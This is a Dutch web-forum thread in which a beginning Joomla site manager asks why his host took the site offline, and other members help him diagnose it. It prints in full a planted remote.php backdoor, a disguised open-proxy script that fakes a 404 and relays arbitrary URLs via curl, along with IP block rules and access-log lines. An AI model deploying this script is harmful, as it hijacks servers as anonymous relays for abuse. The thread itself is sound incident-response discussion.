PHPhulp.nl
35k+ leden Over PHPhulp Offerte opdracht Contact
m

website stilgelegt door veel verkeer op remote.php

Door michel van soest op 17-11-2016 21:59
3.308 views
Goedenavond,

Mijn naam is Michel en voor het eerst op dit forum, ben ook zeker een beginneling op het gebied van PHP.

Mijn vraag is als volgt,

Mijn host heeft een site welke ik beheer (probeer,) tijdelijk uit de lucht gehaald omdat hij denkt dat het gehackt is.
Hij geeft aan in een bericht dat er extreem veel dataverkeer werd gegenereerd. Als ik mijn log op de server bekijk zie ik dat er veel gebeurd via een Frans IP adres zie hieronder.

France PAGES 601,395 HITS 601,395 BANDWIDTH 27.93 GB 17 Nov 2016 - 00:13
France PAGES 889 HITS 889 BANDWIDTH 33.70 MB 16 Nov 2016 - 23:00


Dit alles volgens mij via onderstaand PHP file,

Dynamic PHP Script file, HITS 603,315 PRECENT 99.7 % / BANDWIDTH 27.97 GB PRECENT 99.9 %

/modules/mod_stat/remote.php VIEWED 602,284 AVARAGE SIZE 48.68 KB ENTRY 109 EXTIS 108


Is er iemand die mij wat meer kan vertellen wat hier gebeurt?
- Ariën -
17-11-2016 22:26 gewijzigd op 17-11-2016 22:28
Dat is lastig te zeggen zonder te weten wat remote.php doet. Is het een belangrijk bestand voor de werking van je script? Zo niet, schakel hem dan uit door het te hernoemen of te verwijderen.

En is het één IP die het bestand opvraagt? Blokkeer deze dan in .htaccess.
Maar de werking is het belangrijkst. Het kán misschien zijn dat je een bron bent van malware, phishing of spamming. Dat is nu nog lastig te zeggen zonder uitleg.
m michel van soest
17-11-2016 23:07
Dank je wel voor je replay,

Ik weet eigenlijk niet waar hij voor dient, ik probeer het te ontcijferen :).
Het zijn twee IP adressen welke veel data genereren, 1 ervan staat (zie ik via Google) op een blacklist.
- Ariën -
17-11-2016 23:12
Kan je meer informatie zien in de acces-logs? Als het een simpele GET-request is op de directe bestandsnaam, dan kan het mogelijk weinig kwaad. Het ligt eraan wat er gebeurt als je hem direct uitvoert.

Ik zou eerst de IP's blokkeren, en uitzoeken wat het script precies is. Is het een groot script? Of valt het nog wel mee met +/- 50 lijnen? Dan mag je de code ervan ook wel laten zien, zodat wij er een blik op kunnen nemen. Maar de access-log's zijn wel van groot belang. Deze staat vaak buiten je public_html of zichtbaar in je control-panel van je hosting.
Ozzie PHP
18-11-2016 00:34
>> Ik weet eigenlijk niet waar hij voor dient, ik probeer het te ontcijferen :).

- Is het bestand op dezelfde datum aangemaakt als de rest van de bestanden in die map?

- Kun je (een stukje) code plaatsen die in dat bestand staat?

Voor nu ... hernoem het bestand even naar iets anders, bijv. remoteX.php
? Onbekende gebruiker
18-11-2016 10:38 gewijzigd op 18-11-2016 10:40
Ben jij de persoon die dit bestand heeft geplaatst?
Zo niet, dan zal hernoemen/verwijderen slechts een tijdelijk effect hebben op de problemen.
Dan is er iemand die toegang heeft tot je account.

Als je de code hier plaatst kunnen wij denk ik ook wel zien of je die zelf geplaatst hebt of niet. :)

Ik zie dit helaas bij ons (Nitroserve hosting) veel voorbij komen.
Gebruik je een CMS pakket (Wordpress, Joomla, Drupal, etc.)?
m michel van soest
18-11-2016 14:03
Hoi alle,

Antwoord op Ariën: ik ga even zoeken naar de acces logs, De 2 IP's heb ik nu geblokkeerd. Het script is toegevoegd zie onder.

Antwoord op Ozzie: zie code hieronder

Antwoord op Sander: Nee ik heb de code niet gemaakt ik heb het beheer overgenomen de website bestond al lange tijd. de code staat hieronder bijgevoegd. De website is gemaakt met Joomla, de meeste recente update geïnstalleerd.



<?php
error_reporting(E_ERROR);
ini_set("display_errors", 0);
if (!isset($_POST['url']) && !isset($_POST['timeout'])) {header('HTTP/1.1 404 Not Found');echo '<title>404 - File Not Found</title><h1>404 - File Not Found</h1>';exit;}

$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_URL, $_POST['url']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if (isset($_REQUEST['iface'])) curl_setopt($ch, CURLOPT_INTERFACE, $_REQUEST['iface']);
if (isset($_POST['proxy'])) {curl_setopt($ch, CURLOPT_PROXY, $_POST['proxy']); curl_setopt($ch, CURLOPT_PROXYTYPE, ($_POST['proxy'])?CURLPROXY_HTTP:CURLPROXY_SOCKS5);}
curl_setopt($ch, CURLOPT_TIMEOUT, $_POST['timeout']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
echo curl_redir_exec($ch);

function curl_redir_exec($ch){
static $curl_loops = 0;
static $curl_max_loops = 20;
if ($curl_loops >= $curl_max_loops) {
$curl_loops = 0;
return FALSE;
}
curl_setopt($ch, CURLOPT_HEADER, true);
$data = curl_exec($ch);
@list($header, $data) = explode("\r\n\r\n", $data, 2);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 301 || $http_code == 302) {
$matches = array();
preg_match('/Location:(.*?)\n/', $header, $matches);
$url = @parse_url(trim(array_pop($matches)));
if (!$url){
$curl_loops = 0;
return $data;
}
$last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];
if (!$url['host']) $url['host'] = $last_url['host'];
if (!$url['path']) $url['path'] = $last_url['path'];
$new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query']?'?'.$url['query']:'');
curl_setopt($ch, CURLOPT_URL, $new_url);
return curl_redir_exec($ch);
}else{
$curl_loops=0;
return $data;
}
}
?>

[size=xsmall]Toevoeging op 18/11/2016 14:15:49:[/size]

Ik heb in de htacces de volgende code gemaakt, dit om ip's te blokkeren.
Toch is er vandaag via de ip's verbinding geweest.

Options -Indexes
order allow,deny
deny from 91.121.106.94
deny from 176.31.246.38
allow from all
- Ariën -
18-11-2016 14:17
Ik heb zelf geen Joomla, maar is dit script wel van Joomla? En wanneer is het aangemaakt?
Het is een proxy-script die websites oproept. Mogelijk voor malafide praktijken, zodat jij verantwoordelijk kan zijn.

[size=xsmall]Toevoeging op 18/11/2016 14:22:07:[/size]

En hoe heet je bestand?
Hopelijk toch wel .htaccess met een punt, dubbel 'c' en dubbel 's'?

Test het eens met je eigen IP anders uit, of het werkt.
m michel van soest
18-11-2016 14:57
- Ariën - op 18/11/2016 14:17:45

Ik heb zelf geen Joomla, maar is dit script wel van Joomla? En wanneer is het aangemaakt?
Het is een proxy-script die websites oproept. Mogelijk voor malafide praktijken, zodat jij verantwoordelijk kan zijn.

[size=xsmall]Toevoeging op 18/11/2016 14:22:07:[/size]

En hoe heet je bestand?
Hopelijk toch wel .htaccess met een punt, dubbel 'c' en dubbel 's'?

Test het eens met je eigen IP anders uit, of het werkt.


Hoi Ariën,

Het is htaccess die punt kan ik zo even niet zien

Dat er iets niet goed zit is duidelijk, we hebben de website weer uit de lucht gehaald. Er zijn in Joomla een aantal gebruikers aangemaakt welke admin of super rechten hebben.
Ik ben nog opzoek of dit bestand wel bij Joomla hoort. Alle bestanden in de mod_stat map van Joomla zijn laatst gewijzigd op 18-10-2016.Wanneer het aangemaakt is kan ik verder niet zien.
- Ariën -
18-11-2016 15:10
Ik zou de site eerst maar even sluiten, en Joomla van de laatste patches voorzien. Ik heb vorige maand nog geschreven over een lek in Joomla, welke inderdaad kan zorgen voor registraties met verhoogde rechten.

Om welke Joomla gaat het nu die je nu hebt?
m michel van soest
18-11-2016 15:19
- Ariën - op 18/11/2016 15:10:02

Ik zou de site eerst maar even sluiten, en Joomla van de laatste patches voorzien. Ik heb vorige maand nog geschreven over een lek in Joomla, welke inderdaad kan zorgen voor registraties met verhoogde rechten.

Om welke Joomla gaat het nu die je nu hebt?


Site is nu offline de Joomla versie met welke ik geüpdatet heb is versie 3.6.2.

Hier een klein stukje log dit gaat 100+ regels door,

2016-11-18 08:01:02 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) 7.15 K IIS-toegang

2016-11-18 08:01:02 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 7.15 K
IIS-toegang

2016-11-18 08:01:02 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 7.15 K IIS-toegang

2016-11-18 08:01:02 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36 7.15 K IIS-toegang

2016-11-18 08:01:02 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 25.8 K IIS-toegang

2016-11-18 08:01:04 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 33.5 K IIS-toegang

2016-11-18 08:01:04 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 116 K IIS-toegang

2016-11-18 08:01:04 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 63.3 K IIS-toegang

2016-11-18 08:01:06 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 25.7 K IIS-toegang

2016-11-18 08:01:07 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 57.9 K IIS-toegang

2016-11-18 08:01:08 176.31.246.38 200 POST /modules/mod_stat/remote.php - HTTP/1.1

Reageren

Inloggen om te reageren